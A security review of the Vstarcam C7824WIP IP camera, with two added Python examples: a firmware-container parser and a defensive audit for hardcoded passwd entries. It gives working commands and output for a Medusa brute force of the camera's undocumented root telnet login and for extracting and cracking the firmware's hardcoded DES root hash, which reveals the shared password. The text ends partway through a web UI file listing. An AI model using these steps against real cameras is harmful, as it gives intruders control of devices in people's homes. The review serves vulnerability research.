C7824WIP Security Review


1. Camera specifications

Brand : Vstarcam
Product name : C7824WIP HD indoor IP Camera
Model : C7824WIP
OS : Embedded Linux OS
CPU :

> cat /proc/cpuinfo
Processor       : ARM926EJ-S rev 5 (v5l)
BogoMIPS        : 217.08
Features        : swp half thumb fastmult edsp java
CPU implementer : 0x41
CPU architecture: 5TEJ
CPU variant     : 0x0
CPU part        : 0x926
CPU revision    : 5

Hardware        : hi3518
Revision        : 0000
Serial          : 0000000000000000

2. Security vulnerabilities

Achievements :
– Remotely take control of the camera (telnet)
– Find the web UI password

Methods :
– Bruteforce : success
– Firmware reverse engineering : success
– Form injection : success

3. Network services analysis

Scan all the active network services on the camera using Nmap :

>nmap -sV 192.168.1.16

Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-21 20:59 SGT
Nmap scan report for 192.168.1.16
Host is up (0.014s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
23/tcp open  telnet?
81/tcp open  http    GoAhead-Webs httpd

80/http : The web interface : Documented
23/telnet : Remote command line access : Undocumented

4. Telnet penetration test

4.1 Method 1 : Bruteforce

The password is cracked in a few seconds using Medusa. Hydra fails to crack the password.

>medusa -u root -P passwords.txt -h 192.168.1.16 -M telnet
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 111111 (1 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 11111111 (2 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 112233 (3 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 121212 (4 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (5 of 370 complete)
ACCOUNT CHECK: [telnet] Host: 192.168.1.16 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 370 complete)
ACCOUNT FOUND: [telnet] Host: 192.168.1.16 User: root Password: 123456 [SUCCESS]

The root password : 123456.

4.2 Method 2 : Reverse engineering

4.2.1 Tools
Binwalk

Binwalk is a firmware analysis tool designed for analyzing, reverse engineering and extracting data contained in firmware images.

The latest stable version of Binwalk (2.1.1) was not extracting the firmware correctly, so I had to install version 2.0.0. The bug should be solved in the next version.

Install Binwalk 2.0.0 :

> wget https://github.com/devttys0/binwalk/archive/v2.0.0.zip
> unzip v2.0.0.zip
> cd binwalk-2.0.0
> ./deps.sh
> ./configure
> make
> make install

4.2.2 Firmware reverse engineering
Firmware servers and download link

Sniffing the traffic between the Vstarcam firmware upgrade software and the Internet lets us easily identify the servers and the protocol used to retrieve and upgrade the camera firmware.

Remote file : http://45.63.8.70/FM/system/firmware.txt

So we can download our firmware (45.63.8.70) using the following link : http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip

Firmware download and extraction

Create a working folder :

> mkdir firmware
> cd firmware

Download and extract the zipped firmware :

> wget http://45.63.8.70/FM/system/CH-sys-48.53.64.67.zip
> unzip CH-sys-48.53.64.67.zip	

Binary header analysis :

> head -n1 CH-sys-48.53.64.67.bin | hexdump -C
00000000  77 77 77 2e 6f 62 6a 65  63 74 2d 63 61 6d 65 72  |www.object-camer|
00000010  61 2e 63 6f 6d 2e 62 79  2e 68 6f 6e 67 7a 78 2e  |a.com.by.hongzx.|
00000020  73 79 73 74 65 6d 2f 73  79 73 74 65 6d 2f 6c 69  |system/system/li|
00000030  62 2f 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |b/..............|
00000040  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00000060  6c 69 62 73 6e 73 5f 67  63 31 30 30 34 2e 73 6f  |libsns_gc1004.so|
00000070  2e 7a 69 70 00 00 00 00  00 00 00 00 00 00 00 00  |.zip............|
00000080  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000000a0  e3 23 00 00 43 40 35 30  00 00 00 00 50 4b 03 04  |.#..C@50....PK..|
000000b0  14 00 00 00 08 00 fa 8b  5d 47 89 42 30 43 09 23  |........]G.B0C.#|
000000c0  00 00 93 4a 00 00 22 00  1c 00 73 79 73 74 65 6d  |...J.."...system|
000000d0  2f 73 79 73 74 65 6d 2f  6c 69 62 2f 6c 69 62 73  |/system/lib/libs|
000000e0  6e 73 5f 67 63 31 30 30  34 2e 73 6f 55 54 09 00  |ns_gc1004.soUT..|
000000f0  03 88 e7 31 56 88 e7 31  56 75 78 0b 00 01 04 ed  |...1V..1Vux.....|
00000100  03 00 00 04 ed 03 00 00  e5 7c 0b 78 53 55 d6 f6  |.........|.xSU..|
00000110  3e b9 b4 69 9a cb 69 cf  29 96 8b 92 0a           |>..i..i.)....|

We should be able to use Binwalk to extract the firmware :

> binwalk -Mer CH-sys-48.53.64.67.bin

Scan Time:     2016-01-20 01:02:57
Target File:   CH-sys-48.53.64.67.bin
MD5 Checksum:  58df9214226cfe46760215bfca0c496c
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
172           0xAC            Zip archive data, at least v2.0 to extract, compressed size: 8969,  uncompressed size: 19091, name: "system/system/lib/libsns_gc1004.so"
9337          0x2479          End of Zip archive
9499          0x251B          Zip archive data, at least v2.0 to extract, compressed size: 7813,  uncompressed size: 16341, name: "system/system/lib/libsns_ov9712_plus.so"
17518         0x446E          End of Zip archive
17680         0x4510          Zip archive data, at least v2.0 to extract, compressed size: 90121,  uncompressed size: 353248, name: "system/system/lib/libOnvif.so"
107987        0x1A5D3         End of Zip archive
108149        0x1A675         Zip archive data, at least v2.0 to extract, compressed size: 43603,  uncompressed size: 84480, name: "system/system/lib/libvoice_arm.so"
151946        0x2518A         End of Zip archive
152108        0x2522C         Zip archive data, at least v2.0 to extract, compressed size: 130,  uncompressed size: 227, name: "system/init/ipcam.sh"
152406        0x25356         End of Zip archive
152568        0x253F8         Zip archive data, at least v2.0 to extract, compressed size: 402383,  uncompressed size: 886168, name: "system/system/bin/encoder"
555129        0x87879         End of Zip archive
555291        0x8791B         Zip archive data, at least v2.0 to extract, compressed size: 35394,  uncompressed size: 74200, name: "system/system/bin/wifidaemon"
590869        0x90415         End of Zip archive
591031        0x904B7         Zip archive data, at least v2.0 to extract, compressed size: 1852,  uncompressed size: 9692, name: "system/system/bin/grade.sh"
593063        0x90CA7         End of Zip archive
593225        0x90D49         Zip archive data, at least v2.0 to extract, compressed size: 8704,  uncompressed size: 20212, name: "system/system/bin/updata"
602105        0x92FF9         End of Zip archive
602267        0x9309B         Zip archive data, at least v2.0 to extract, compressed size: 1874,  uncompressed size: 4522, name: "system/system/bin/gpio_aplink.ko"
604333        0x938AD         End of Zip archive
604495        0x9394F         Zip archive data, at least v2.0 to extract, compressed size: 7241,  uncompressed size: 16802, name: "system/system/bin/motogpio.ko"
611922        0x95652         End of Zip archive
612084        0x956F4         Zip archive data, at least v1.0 to extract, compressed size: 8,  uncompressed size: 8, name: "system/system/bin/fwversion.bin"
612282        0x957BA         End of Zip archive
612444        0x9585C         Zip archive data, at least v1.0 to extract, compressed size: 9,  uncompressed size: 9, name: "system/system/bin/sysversion.txt"
612645        0x95925         End of Zip archive

Using tree to see the files available :

> tree _CH-sys-48.53.64.67.bin.extracted/
_CH-sys-48.53.64.67.bin.extracted/
└── system
    ├── init
    │   └── ipcam.sh
    └── system
        ├── bin
        │   ├── encoder
        │   ├── fwversion.bin
        │   ├── gpio_aplink.ko
        │   ├── grade.sh
        │   ├── motogpio.ko
        │   ├── sysversion.txt
        │   ├── updata
        │   └── wifidaemon
        └── lib
            ├── libOnvif.so
            ├── libsns_gc1004.so
            ├── libsns_ov9712_plus.so
            └── libvoice_arm.so

5 directories, 13 files

Done !
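
The hexdump and the Binwalk offsets above are enough to read the container without Binwalk. The following is an added example, not part of the original review or of any vendor tool: a parser for the layout inferred from this one image (32-byte magic, then per file a 64-byte directory, a 64-byte zip name, a 4-byte little-endian length, 8 bytes of unknown meaning and the zip itself). The field meanings and the constructed sample container are assumptions.

```python
import io
import struct
import zipfile

# Layout inferred from the hexdump and Binwalk offsets on this page (an
# assumption, not a vendor specification):
#   32-byte magic, then one record per file:
#     64-byte NUL-padded destination directory
#     64-byte NUL-padded name of the embedded zip
#     4-byte little-endian length of the zip
#     8 bytes of unknown meaning ("C@50" plus four NULs in the dump)
#     the zip archive itself
MAGIC = b"www.object-camera.com.by.hongzx."
RECORD_HEADER = struct.Struct("<64s64sI8s")  # 140 bytes, no padding


def _text(field):
    """Decode a NUL-padded header field."""
    return field.split(b"\x00", 1)[0].decode("ascii", "replace")


def parse_container(blob):
    """Return one dict per embedded zip; raise ValueError on malformed input."""
    if not blob.startswith(MAGIC):
        raise ValueError("missing container magic")
    records = []
    pos = len(MAGIC)
    while pos < len(blob):
        if pos + RECORD_HEADER.size > len(blob):
            raise ValueError(f"truncated record header at offset {pos:#x}")
        directory, name, length, unknown = RECORD_HEADER.unpack_from(blob, pos)
        zip_offset = pos + RECORD_HEADER.size
        zip_end = zip_offset + length
        if zip_end > len(blob):
            raise ValueError(f"record at {pos:#x} runs past the end of the file")
        payload = blob[zip_offset:zip_end]
        if not payload.startswith(b"PK\x03\x04"):
            raise ValueError(f"no zip local header at offset {zip_offset:#x}")
        try:
            with zipfile.ZipFile(io.BytesIO(payload)) as zf:
                members = [(i.filename, i.file_size) for i in zf.infolist()]
        except zipfile.BadZipFile as exc:
            raise ValueError(f"bad zip at offset {zip_offset:#x}") from exc
        records.append({
            "directory": _text(directory),
            "zip_name": _text(name),
            "zip_offset": zip_offset,
            "zip_length": length,
            "unknown": unknown,
            "members": members,
        })
        pos = zip_end  # the next record header follows the zip directly
    return records


def build_sample():
    """Constructed two-record container (not real firmware), same layout."""
    def make_zip(member, data):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
            zf.writestr(member, data)
        return buf.getvalue()

    entries = [
        (b"system/system/lib/", b"libsns_gc1004.so.zip",
         "system/system/lib/libsns_gc1004.so", b"\x7fELF" + bytes(60)),
        (b"system/init/", b"ipcam.sh.zip",
         "system/init/ipcam.sh", b"#!/bin/sh\n"),
    ]
    blob = MAGIC
    for directory, name, member, data in entries:
        archive = make_zip(member, data)
        # struct pads the two 64s fields with NULs, as in the hexdump.
        blob += RECORD_HEADER.pack(directory, name, len(archive),
                                   b"C@50\x00\x00\x00\x00") + archive
    return blob


if __name__ == "__main__":
    for rec in parse_container(build_sample()):
        print(f"{rec['zip_offset']:#08x} {rec['zip_length']:>8} "
              f"{rec['directory']}{rec['zip_name']} -> {rec['members']}")
```

With this layout the first zip starts at offset 172 (0xAC), and each later zip starts 140 bytes after the previous one ends, which matches the Binwalk table above.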

Firmware analysis and password retrieval

Looking for the files containing the “passwd” string :

> grep -r "passwd" .
Binary file ./system/system/bin/wifidaemon matches
Binary file ./system/system/bin/encoder matches

Then check these files for the password.
– wifidaemon :

> strings system/system/bin/wifidaemon | grep -A 1 -B 1 passwd
iRet %d pkey:%s keyvalue:%s
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

– encoder :

> strings system/system/bin/encoder | grep -A 1 -B 1 passwd
factory_user
factory_passwd
factory_alarmserver
--
alarmuser
alarmpasswd
alarmdeviceid
--
===websLaunchCgiProc===
/etc/passwd
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
--
SET_PARAMETER
check_user_passwd  right
check_user_passwd  erro
Unknown RTSP server state[%d]

So the hashed password for the root user is LSiuY7pOmZG2s. This is a hash, not the password itself, so it can't be used to log in directly. We need to crack it first :

> echo "root:LSiuY7pOmZG2s" > password.txt
> john password.txt
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
123456           (root)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 17680  trying: 12345 - biteme
Use the "--show" option to display all of the cracked passwords reliably

The root password : 123456.
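
The same finding can be turned into a firmware audit check. The following is an added example, not part of the original review: it scans extracted firmware files for embedded /etc/passwd entries, as the grep and strings steps above do, and classifies the hash scheme of each entry so that hardcoded root accounts and legacy DES hashes are flagged before release. The sample file contents are constructed (the wifidaemon entry reuses the line shown above; the file named "hardened" and its entries are hypothetical).

```python
import re

# A passwd(5) entry embedded anywhere in a binary: name:hash:uid:gid:gecos:home:shell
PASSWD_ENTRY = re.compile(
    rb"([A-Za-z_][A-Za-z0-9_.-]{0,31}):([^:\s\x00]{0,128}):(\d{1,10}):(\d{1,10}):"
    rb"([^:\n\x00]*):([^:\n\x00]*):([^:\s\x00]*)"
)
# Traditional DES crypt(3): 2 salt characters + 11 hash characters.
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")
MODULAR_PREFIXES = {
    "$1$": "md5-crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256-crypt",
    "$6$": "sha512-crypt",
    "$y$": "yescrypt",
}
# Schemes treated as weak here: no password at all, DES crypt (only the first
# 8 password characters are used, 12-bit salt) and md5-crypt.
WEAK_SCHEMES = {"empty", "des-crypt", "md5-crypt"}
NO_HASH_PRESENT = {"shadowed", "locked"}


def classify_hash(field):
    """Name the scheme of a passwd hash field without attempting to crack it."""
    if field == "":
        return "empty"
    if field == "x":
        return "shadowed"          # real hash lives in /etc/shadow
    if field[0] in "*!":
        return "locked"
    for prefix, scheme in MODULAR_PREFIXES.items():
        if field.startswith(prefix):
            return scheme
    if DES_CRYPT.match(field):
        return "des-crypt"
    return "unknown"


def audit_binary(path, data):
    """Return one finding per passwd entry found in the bytes of one file."""
    findings = []
    for match in PASSWD_ENTRY.finditer(data):
        user = match.group(1).decode("ascii")
        scheme = classify_hash(match.group(2).decode("ascii", "replace"))
        uid = int(match.group(3))
        findings.append({
            "file": path,
            "offset": match.start(),
            "user": user,
            "uid": uid,
            "scheme": scheme,
            "weak": scheme in WEAK_SCHEMES,
            # A uid-0 entry that carries its own credential ships in every unit.
            "hardcoded_root": uid == 0 and scheme not in NO_HASH_PRESENT,
        })
    return findings


def audit_firmware(files):
    """Audit a {path: bytes} mapping of extracted firmware files."""
    findings = []
    for path in sorted(files):
        findings.extend(audit_binary(path, files[path]))
    return findings


# Constructed sample input standing in for the extracted tree.
SAMPLE_FIRMWARE = {
    "system/system/bin/wifidaemon": (
        b"\x7fELF\x01\x01iRet %d pkey:%s keyvalue:%s\x00/etc/passwd\x00"
        b"root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh\x00"
    ),
    "system/system/bin/hardened": (      # hypothetical file name
        b"\x7fELF\x00root:x:0:0:root:/root:/bin/sh\n"
        b"svc:$6$constructedsalt$" + b"A" * 86 + b":1000:1000::/home/svc:/bin/sh\n"
    ),
    "system/init/ipcam.sh": b"#!/bin/sh\nexport PATH=/system/system/bin:$PATH\n",
}

if __name__ == "__main__":
    for f in audit_firmware(SAMPLE_FIRMWARE):
        flag = "FAIL" if f["weak"] or f["hardcoded_root"] else "ok"
        print(f"{flag:4} {f['file']} @{f['offset']} {f['user']} "
              f"uid={f['uid']} scheme={f['scheme']}")
```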

4.2.3 WebUI reverse engineering

Now that you have root access, you could log in and retrieve the whole WebUI directly from the device. However, we’ll show the reverse engineering way here.

Firmware servers and download link

Sniffing the traffic between the Vstarcam firmware upgrade software and the Internet lets us easily identify the servers and the protocol used to retrieve and upgrade the camera WebUI.

Remote file: http://45.63.8.70/FM/vstarcam/firmware.txt

So we can download the WebUI EN53.8.1.13 using the following link : http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip

WebUI download and extraction

Create a working folder :

> mkdir webui
> cd webui

Download and extract the zipped firmware :

> wget http://45.63.8.70/FM/vstarcam/CH-app-CH53.8.1.13_VSTARCAM.zip
> unzip CH-app-CH53.8.1.13_VSTARCAM.zip	

Now we can use Binwalk to extract the .bin firmware :

> binwalk -Mer CH-app-EN53.8.1.13_VSTARCAM.bin

Scan Time:     2016-01-21 01:29:23
Target File:   CH-app-EN53.8.1.13_VSTARCAM.bin
MD5 Checksum:  41965a8a4aea9293a0b111e7bf004fcc
Signatures:    285

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
36            0x24            Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/"
98            0x62            Zip encrypted archive data, at least v2.0 to extract, compressed size: 1593,  uncompressed size: 10647, name: "www/admin.htm"
1750          0x6D6           Zip encrypted archive data, at least v2.0 to extract, compressed size: 1583,  uncompressed size: 10326, name: "www/admin2.htm"
3393          0xD41           Zip encrypted archive data, at least v2.0 to extract, compressed size: 3870,  uncompressed size: 17524, name: "www/alarm.htm"
7322          0x1C9A          Zip encrypted archive data, at least v2.0 to extract, compressed size: 116018,  uncompressed size: 137930, name: "www/alarm.pcm"
123399        0x1E207         Zip encrypted archive data, at least v2.0 to extract, compressed size: 857,  uncompressed size: 1972, name: "www/alias.htm"
124315        0x1E59B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 948,  uncompressed size: 2458, name: "www/ap.htm"
125319        0x1E987         Zip encrypted archive data, at least v1.0 to extract, compressed size: 40,  uncompressed size: 28, name: "www/appver.js"
125418        0x1E9EA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 924,  uncompressed size: 2265, name: "www/audio.htm"
126401        0x1EDC1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 250,  uncompressed size: 384, name: "www/audioparam.bin"
126715        0x1EEFB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1374,  uncompressed size: 4439, name: "www/datetime.htm"
128151        0x1F497         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2935,  uncompressed size: 12570, name: "www/ddns.htm"
131144        0x20048         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1048,  uncompressed size: 2377, name: "www/dns.htm"
132249        0x20499         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/english/"
132319        0x204DF         Zip encrypted archive data, at least v2.0 to extract, compressed size: 213,  uncompressed size: 449, name: "www/english/oem.js"
132596        0x205F4         Zip encrypted archive data, at least v2.0 to extract, compressed size: 10268,  uncompressed size: 31357, name: "www/english/string.js"
142931        0x22E53         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1449,  uncompressed size: 5038, name: "www/ftp.htm"
144437        0x23435         Zip encrypted archive data, at least v2.0 to extract, compressed size: 785,  uncompressed size: 13019, name: "www/functions.htm"
145285        0x23785         Zip encrypted archive data, at least v1.0 to extract, compressed size: 12,  name: "www/images/"
145354        0x237CA         Zip encrypted archive data, at least v1.0 to extract, compressed size: 289,  uncompressed size: 277, name: "www/images/2_10.gif"
145708        0x2392C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 101,  uncompressed size: 95, name: "www/images/2_11.gif"
145874        0x239D2         Zip encrypted archive data, at least v2.0 to extract, compressed size: 164,  uncompressed size: 197, name: "www/images/2_13.gif"
146103        0x23AB7         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1726,  uncompressed size: 1714, name: "www/images/2_16.gif"
147894        0x241B6         Zip encrypted archive data, at least v1.0 to extract, compressed size: 676,  uncompressed size: 664, name: "www/images/2_17.gif"
148635        0x2449B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 101,  uncompressed size: 95, name: "www/images/2_19.gif"
148801        0x24541         Zip encrypted archive data, at least v1.0 to extract, compressed size: 678,  uncompressed size: 666, name: "www/images/2_20.gif"
149544        0x24828         Zip encrypted archive data, at least v1.0 to extract, compressed size: 291,  uncompressed size: 279, name: "www/images/2_27.gif"
149900        0x2498C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 62,  uncompressed size: 54, name: "www/images/2_item.gif"
150029        0x24A0D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 155,  uncompressed size: 154, name: "www/images/333.gif"
150248        0x24AE8         Zip encrypted archive data, at least v2.0 to extract, compressed size: 326,  uncompressed size: 512, name: "www/images/alarm.gif"
150640        0x24C70         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2438,  uncompressed size: 3516, name: "www/images/alarm.wav"
153144        0x25638         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1078,  uncompressed size: 1167, name: "www/images/alert.gif"
154288        0x25AB0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 627,  uncompressed size: 643, name: "www/images/autopos.gif"
154983        0x25D67         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1157,  uncompressed size: 1145, name: "www/images/back.gif"
156205        0x2622D         Zip encrypted archive data, at least v2.0 to extract, compressed size: 214,  uncompressed size: 211, name: "www/images/bg.png"
156482        0x26342         Zip encrypted archive data, at least v2.0 to extract, compressed size: 16438,  uncompressed size: 29471, name: "www/images/bg_right.jpg"
172989        0x2A3BD         Zip encrypted archive data, at least v2.0 to extract, compressed size: 12816,  uncompressed size: 12911, name: "www/images/btn_circle.gif"
185876        0x2D614         Zip encrypted archive data, at least v2.0 to extract, compressed size: 548,  uncompressed size: 600, name: "www/images/btn_jianting.gif"
186497        0x2D881         Zip encrypted archive data, at least v2.0 to extract, compressed size: 544,  uncompressed size: 600, name: "www/images/btn_jianting_on.gif"
187117        0x2DAED         Zip encrypted archive data, at least v2.0 to extract, compressed size: 763,  uncompressed size: 797, name: "www/images/btn_luxiang.gif"
187952        0x2DE30         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1008,  uncompressed size: 1192, name: "www/images/btn_luxiang_on.gif"
189035        0x2E26B         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328,  uncompressed size: 1316, name: "www/images/btn_paizhao.gif"
190435        0x2E7E3         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1328,  uncompressed size: 1316, name: "www/images/btn_shezhi.gif"
191834        0x2ED5A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 554,  uncompressed size: 622, name: "www/images/btn_talk.gif"
192457        0x2EFC9         Zip encrypted archive data, at least v2.0 to extract, compressed size: 705,  uncompressed size: 1025, name: "www/images/btn_talk_on.gif"
193234        0x2F2D2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1775,  uncompressed size: 1763, name: "www/images/CD.gif"
195072        0x2FA00         Zip encrypted archive data, at least v1.0 to extract, compressed size: 2002,  uncompressed size: 1990, name: "www/images/client.gif"
197141        0x30215         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1111,  uncompressed size: 1406, name: "www/images/clr_bright.gif"
198323        0x306B3         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1082,  uncompressed size: 1392, name: "www/images/clr_contast.gif"
199477        0x30B35         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1133,  uncompressed size: 1393, name: "www/images/clr_hue.gif"
200678        0x30FE6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1183,  uncompressed size: 1378, name: "www/images/clr_saturation.gif"
201936        0x314D0         Zip encrypted archive data, at least v2.0 to extract, compressed size: 490,  uncompressed size: 596, name: "www/images/del.gif"
202490        0x316FA         Zip encrypted archive data, at least v2.0 to extract, compressed size: 499,  uncompressed size: 598, name: "www/images/download.gif"
203058        0x31932         Zip encrypted archive data, at least v2.0 to extract, compressed size: 141,  uncompressed size: 132, name: "www/images/elogo.gif"
203265        0x31A01         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1932,  uncompressed size: 1920, name: "www/images/firefox.gif"
205265        0x321D1         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4536,  uncompressed size: 4593, name: "www/images/green.gif"
209867        0x333CB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 915,  uncompressed size: 1049, name: "www/images/hpatrol.gif"
210850        0x337A2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 637,  uncompressed size: 625, name: "www/images/hpatrol_down.gif"
211560        0x33A68         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1123,  uncompressed size: 1367, name: "www/images/hpatrol_up.gif"
212754        0x33F12         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1623,  uncompressed size: 1611, name: "www/images/IE.gif"
214440        0x345A8         Zip encrypted archive data, at least v2.0 to extract, compressed size: 29969,  uncompressed size: 30067, name: "www/images/index_bg.gif"
244478        0x3BAFE         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1849,  uncompressed size: 1837, name: "www/images/iphone.gif"
246394        0x3C27A         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1131,  uncompressed size: 1363, name: "www/images/ir0.gif"
247589        0x3C725         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1145,  uncompressed size: 1355, name: "www/images/ir1.gif"
248798        0x3CBDE         Zip encrypted archive data, at least v2.0 to extract, compressed size: 575,  uncompressed size: 621, name: "www/images/line.gif"
249438        0x3CE5E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 2953,  uncompressed size: 2955, name: "www/images/logo.gif"
252456        0x3DA28         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1580,  uncompressed size: 1622, name: "www/images/logo1.gif"
254102        0x3E096         Zip encrypted archive data, at least v1.0 to extract, compressed size: 3118,  uncompressed size: 3106, name: "www/images/logo2.gif"
257286        0x3ED06         Zip encrypted archive data, at least v2.0 to extract, compressed size: 626,  uncompressed size: 639, name: "www/images/mirror.gif"
257979        0x3EFBB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 921,  uncompressed size: 940, name: "www/images/mirror_on.gif"
258970        0x3F39A         Zip encrypted archive data, at least v1.0 to extract, compressed size: 184,  uncompressed size: 172, name: "www/images/modellogo.gif"
259224        0x3F498         Zip encrypted archive data, at least v2.0 to extract, compressed size: 301,  uncompressed size: 301, name: "www/images/nav-1.gif"
259591        0x3F607         Zip encrypted archive data, at least v2.0 to extract, compressed size: 254,  uncompressed size: 258, name: "www/images/nav.gif"
259909        0x3F745         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1019,  uncompressed size: 1145, name: "www/images/network.gif"
260996        0x3FB84         Zip encrypted archive data, at least v2.0 to extract, compressed size: 459,  uncompressed size: 580, name: "www/images/no.gif"
261518        0x3FD8E         Zip encrypted archive data, at least v2.0 to extract, compressed size: 270,  uncompressed size: 337, name: "www/images/ok.gif"
261851        0x3FEDB         Zip encrypted archive data, at least v2.0 to extract, compressed size: 852,  uncompressed size: 1165, name: "www/images/option.gif"
262770        0x40272         Zip encrypted archive data, at least v1.0 to extract, compressed size: 2007,  uncompressed size: 1995, name: "www/images/osd01.gif"
264843        0x40A8B         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1628,  uncompressed size: 1616, name: "www/images/osd02.gif"
266537        0x41129         Zip encrypted archive data, at least v2.0 to extract, compressed size: 233,  uncompressed size: 229, name: "www/images/p.gif"
266832        0x41250         Zip encrypted archive data, at least v1.0 to extract, compressed size: 7826,  uncompressed size: 7814, name: "www/images/pan_1.gif"
274724        0x43124         Zip encrypted archive data, at least v1.0 to extract, compressed size: 999,  uncompressed size: 987, name: "www/images/pan_2.gif"
275789        0x4354D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1091,  uncompressed size: 1079, name: "www/images/pan_3.gif"
276946        0x439D2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 16746,  uncompressed size: 16734, name: "www/images/pan_4.gif"
293758        0x47B7E         Zip encrypted archive data, at least v1.0 to extract, compressed size: 1842,  uncompressed size: 1830, name: "www/images/phone.gif"
295666        0x482F2         Zip encrypted archive data, at least v1.0 to extract, compressed size: 779,  uncompressed size: 767, name: "www/images/playback.gif"
296514        0x48642         Zip encrypted archive data, at least v2.0 to extract, compressed size: 923,  uncompressed size: 1030, name: "www/images/ptz_19.gif"
297504        0x48A20         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1017,  uncompressed size: 1076, name: "www/images/ptz_24.gif"
298588        0x48E5C         Zip encrypted archive data, at least v2.0 to extract, compressed size: 901,  uncompressed size: 1015, name: "www/images/ptz_26.gif"
299556        0x49224         Zip encrypted archive data, at least v2.0 to extract, compressed size: 910,  uncompressed size: 1025, name: "www/images/ptz_29.gif"
300533        0x495F5         Zip encrypted archive data, at least v2.0 to extract, compressed size: 911,  uncompressed size: 1021, name: "www/images/ptz_34.gif"
301511        0x499C7         Zip encrypted archive data, at least v2.0 to extract, compressed size: 714,  uncompressed size: 809, name: "www/images/pt_speed.gif"
302294        0x49CD6         Zip encrypted archive data, at least v1.0 to extract, compressed size: 362,  uncompressed size: 350, name: "www/images/rec.gif"
302720        0x49E80         Zip encrypted archive data, at least v2.0 to extract, compressed size: 1232,  uncompressed size: 1224, name: "www/images/record.gif"
304019        0x4A393         Zip encrypted archive data, at least v2.0 to extract, compressed size: 4595,  uncompressed size: 4644, name: "www/images/red.gif"
308678        0x4B5C6         Zip encrypted archive data, at least v2.0 to extract, compressed size: 624,  uncompressed size: 640, name: "www/images/reversal.gif"
309371        0x4B87B         Zip encrypted archive data, at least v2.0 to extract, compressed size: 929,  uncompressed size: 940, name: "www/images/reversal_on.gif"
310372        0x4BC64         Zip encrypted archive data, at least v1.0 to extract, compressed size: 368,  uncompressed size: 356, name: "www/images/signal0.png"
310808        0x4BE18         Zip encrypted archive data, at least v1.0 to extract, compressed size: 375,  uncompressed size: 363, name: "www/images/signal1.png"
311251        0x4BFD3         Zip encrypted archive data, at least v1.0 to extract, compressed size: 374,  uncompressed size: 362, name: "www/images/signal2.png"
311693        0x4C18D         Zip encrypted archive data, at least v1.0 to extract, compressed size: 380,  uncompressed size: 368, name: "www/images/signal3.png"
